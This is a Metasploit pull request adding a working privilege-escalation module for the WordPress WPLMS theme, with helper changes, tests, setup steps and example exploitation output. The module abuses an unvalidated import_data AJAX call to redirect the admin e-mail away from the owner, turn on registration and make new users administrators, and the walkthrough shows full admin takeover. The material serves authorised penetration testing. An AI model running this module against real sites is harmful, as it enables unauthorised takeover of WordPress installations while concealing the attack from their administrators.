### PR TITLE
Add WordPress WPLMS theme privilege escalation module

### DIFF
--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -97,7 +97,7 @@ module Msf::HTTP::Wordpress::Version
     nil
   end
 
-  def check_version_from_readme(type, name, fixed_version, vuln_introduced_version = nil)
+  def check_version_from_readme(type, name, fixed_version = nil, vuln_introduced_version = nil)
     case type
     when :plugin
       folder = 'plugins'

--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -154,31 +154,6 @@ module Msf::HTTP::Wordpress::Version
       fail("Unknown file type #{type}")
     end
 
-    version_res = extract_and_check_version(res.body.to_s, :readme, type, fixed_version, vuln_introduced_version)
-    if version_res == Msf::Exploit::CheckCode::Detected && type == :theme
-      # If no version could be found in readme.txt for a theme, try style.css
-      return check_theme_version_from_style(name, fixed_version, vuln_introduced_version)
-    else
-      return version_res
-    end
-  end
-
-  def extract_and_check_version(body, type, item_type, fixed_version = nil, vuln_introduced_version = nil)
-    case type
-    when :readme
-      # Try to extract version from readme
-      # Example line:
-      # Stable tag: 2.6.6
-      version = body[/(?:stable tag|version):\s*(?!trunk)([0-9a-z.-]+)/i, 1]
-    when :style
-      # Try to extract version from style.css
-      # Example line:
-      # Version: 1.5.2
-      version = body[/(?:Version):\s*([0-9a-z.-]+)/i, 1]
-    else
-      fail("Unknown file type #{type}")
-    end
-
     # Could not identify version number
     return Msf::Exploit::CheckCode::Detected if version.nil?
 

--- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def check
-    check_theme_version_from_style('wplms', '1.8.4.2', '1.5.2')
+    check_theme_version_from_readme('wplms', '1.8.4.2', '1.5.2')
   end
 
   def username

--- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
@@ -1,0 +1,124 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WPLMS Theme Privilege Escalation',
+      'Description'     => %q{
+          The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows authenticated users of
+          any user level to set any system option via a lack of validation in the import_data function
+          of /includes/func.php.
+
+          The module first changes the admin e-mail address to prevent any
+          notifications being sent to the actual administrator during the attack, re-enables user
+          registration in case it has been disabled and sets the default role to be administrator.
+          This will allow for the user to create a new account with admin privileges via the default
+          registration page found at /wp-login.php?action=register.
+      },
+      'Author'          =>
+        [
+          'Evex',                             # Vulnerability discovery
+          'Rob Carr <rob[at]rastating.com>'   # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['WPVDB', '7785']
+        ],
+      'DisclosureDate'  => 'Feb 09 2015'
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+    check_theme_version_from_style('wplms', '1.8.4.2', '1.5.2')
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def php_serialize(value)
+    # Only strings and numbers are required by this module
+    case value
+    when String, Symbol
+      "s:#{value.bytesize}:\"#{value}\";"
+    when Fixnum
+      "i:#{value};"
+    end
+  end
+
+  def serialize_and_encode(value)
+    serialized_value = php_serialize(value)
+    unless serialized_value.nil?
+      Rex::Text.encode_base64(serialized_value)
+    end
+  end
+
+  def set_wp_option(name, value, cookie)
+    encoded_value = serialize_and_encode(value)
+    if encoded_value.nil?
+      vprint_error("#{peer} - Failed to serialize #{value}.")
+    else
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => wordpress_url_admin_ajax,
+        'vars_get'  => { 'action' => 'import_data' },
+        'vars_post' => { 'name' => name, 'code' => encoded_value },
+        'cookie'    => cookie
+      )
+
+      if res.nil?
+        vprint_error("#{peer} - No response from the target.")
+      else
+        vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+      end
+
+      return res
+    end
+  end
+
+  def run
+    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com"
+    print_status("#{peer} - Changing admin e-mail address to #{new_email}...")
+    if set_wp_option('admin_email', new_email, cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address')
+    end
+
+    print_status("#{peer} - Enabling user registrations...")
+    if set_wp_option('users_can_register', 1, cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations')
+    end
+
+    print_status("#{peer} - Setting the default user role...")
+    if set_wp_option('default_role', 'administrator', cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to set the default user role')
+    end
+
+    register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register')
+    print_good("#{peer} - Privilege escalation complete")
+    print_good("#{peer} - Create a new account at #{register_url} to gain admin access.")
+  end
+end

--- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
@@ -38,8 +38,8 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('USERNAME', [false, 'The WordPress username to authenticate with']),
-        OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with'])
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
       ], self.class)
   end
 

--- a/spec/lib/msf/http/wordpress/version_spec.rb
+++ b/spec/lib/msf/http/wordpress/version_spec.rb
@@ -145,6 +145,97 @@ describe Msf::HTTP::Wordpress::Version do
       it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Safe) }
     end
 
+    context 'when all versions are vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_body) { 'Stable tag: 1.0.0' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name')).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+  end
+
+  describe '#check_theme_version_from_style' do
+    before :each do
+      allow(subject).to receive(:send_request_cgi) do |opts|
+        res = Rex::Proto::Http::Response.new
+        res.code = wp_code
+        res.body = wp_body
+        res
+      end
+    end
+
+    let(:wp_code) { 200 }
+    let(:wp_body) { nil }
+    let(:wp_fixed_version) { nil }
+
+    context 'when no style is found' do
+      let(:wp_code) { 404 }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Unknown) }
+    end
+
+    context 'when no version can be extracted from style' do
+      let(:wp_code) { 200 }
+      let(:wp_body) { 'invalid content' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Detected) }
+    end
+
+    context 'when version from style has arbitrary leading whitespace' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'Version:  1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Appears) }
+      let(:wp_body) { 'Version:1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'Version: 1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is not vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'Version: 1.0.2' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is vulnerable (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.2' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'Version: 1.0.1' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is older (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'Version: 0.0.9' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is newer (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'Version: 1.0.2' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is newer (text in version number)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.5.3' }
+      let(:wp_body) { 'Version: 2.0.0-beta1' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when all versions are vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_body) { 'Version: 1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name')).to be(Msf::Exploit::CheckCode::Appears) }
+    end
   end
 
 end


### PR DESCRIPTION
The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows authenticated users of any user level to set any system option via a lack of validation in the `import_data` function of `/includes/func.php`. The module first changes the admin e-mail address to prevent any notifications being sent to the actual administrator during the attack, re-enables user registration in case it has been disabled and sets the default role to be administrator. This will allow for the user to create a new account with admin privileges via the default registration page found at `/wp-login.php?action=register`.
## References
- https://wpvulndb.com/vulnerabilities/7785
## Important Notes
- This is a premium theme and therefore I don't have a link to provide for it (although some Google wizardry may uncover something...), so I've included in this pull request a number of screenshots and a PCAP to try and illustrate the pre and post-exploitation states.
- Although the original disclosure stated this is an issue with v1.8.4.1, I have confirmed this to be an issue in versions 1.5.2 through to 1.8.4.1. It may even affect versions earlier than that, however I have not been able to confirm that.
- I have added a new version detection method for themes in `lib/msf/http/wordpress/version.rb`, called `check_theme_version_from_style`. This function will check the `style.css` meta data of a theme to determine the version. This should be a more reliable identification method than the use of the readme.txt for themes, as it is a requirement of WordPress theme development that the authors state the theme name and version number in this file (see [Theme Development](http://codex.wordpress.org/Theme_Development#Theme_Stylesheet) for more information) and will also help version identification for themes that do not have a readme.txt file.
- I have modified the readme.txt detection in `lib/msf/http/wordpress/version.rb` as per a discussion [Here](https://github.com/rapid7/metasploit-framework/pull/4769) for themes and plugins that are vulnerable in all versions (i.e. in EOL products). Although this change wasn't needed for this module, I did the work alongside it due to the fact I had to change this file to add an extra version detection method anyway.
## Verification
- [ ] Download and install [WordPress](https://wordpress.org/download/)
- [ ] Install a version of the WPLMS theme in the range of v1.5.2 to v1.8.4.1
- [ ] Load msfconsole and `use auxiliary/admin/http/wp_wplms_privilege_escalation`
- [ ] Set `RHOST` to the target's address
- [ ] If running WordPress in a subdirectory, ensure to set `TARGETURI` appropriately (e.g. if running in a folder called wordpress, set `TARGETURI` to `/wordpress/`)
- [ ] Set `USERNAME` and `PASSWORD` to the credentials of the WordPress user you wish to authenticate as
- [ ] Run `check` to verify the target is vulnerable
- [ ] Run the module
## Example Output

```
msf > use auxiliary/admin/http/wp_wplms_privilege_escalation
msf auxiliary(wp_wplms_privilege_escalation) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf auxiliary(wp_wplms_privilege_escalation) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf auxiliary(wp_wplms_privilege_escalation) > set USERNAME root
USERNAME => root
msf auxiliary(wp_wplms_privilege_escalation) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(wp_wplms_privilege_escalation) > check

[*] 192.168.1.15:80 - Found version 1.5.2 of the theme
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf auxiliary(wp_wplms_privilege_escalation) > run

[*] 192.168.1.15:80 - Authenticating with WordPress using root:toor...
[+] 192.168.1.15:80 - Authenticated with WordPress
[*] 192.168.1.15:80 - Changing admin e-mail address to fOiqY@vaLvi.com...
[*] 192.168.1.15:80 - Enabling user registrations...
[*] 192.168.1.15:80 - Setting the default user role...
[+] 192.168.1.15:80 - Privilege escalation complete
[+] 192.168.1.15:80 - Create a new account at /wordpress/wp-login.php?action=register to gain admin access.
[*] Auxiliary module execution completed

```
## Walkthrough

PCAP download: https://mega.co.nz/#!XI0BRKxD!7SfHhXCYkRvImX-0U3a-XQmaiUDnD_SwigWEttZQo84

Pre-exploitation settings
![pre_exploit_settings_screen](https://cloud.githubusercontent.com/assets/2500434/6250179/1526ffde-b784-11e4-9477-ce920890328c.png)

Pre-exploit registration screen
![pre_exploit_registration_screen](https://cloud.githubusercontent.com/assets/2500434/6250200/32adde9c-b784-11e4-9aca-6dbc1f966121.png)

Post-exploit settings
![post_exploit_settings_screen](https://cloud.githubusercontent.com/assets/2500434/6250227/5944e49c-b784-11e4-8459-f942cd4e6fce.png)

Post-exploit registration screen
![post_exploit_registration_screen](https://cloud.githubusercontent.com/assets/2500434/6250211/48593002-b784-11e4-8a81-1f50d0baf8c8.png)

Registration notification e-mail to admin address upon new user registration
_Note: this admin e-mail is different to the one seen in the PCAP and example output as I took the registration screenshots after having re-executed the module which generated a new random admin e-mail, but this was the correct e-mail for that test_
![admin_notification](https://cloud.githubusercontent.com/assets/2500434/6250257/8a7c4f5a-b784-11e4-81d6-39541476ba33.png)

Registration notification to user
![user_notification](https://cloud.githubusercontent.com/assets/2500434/6250266/9d6794da-b784-11e4-9c7d-42c4760e905e.png)

Compromised admin panel
![compromised_admin_page](https://cloud.githubusercontent.com/assets/2500434/6250276/a6ca568e-b784-11e4-84a5-4804e76f89df.png)
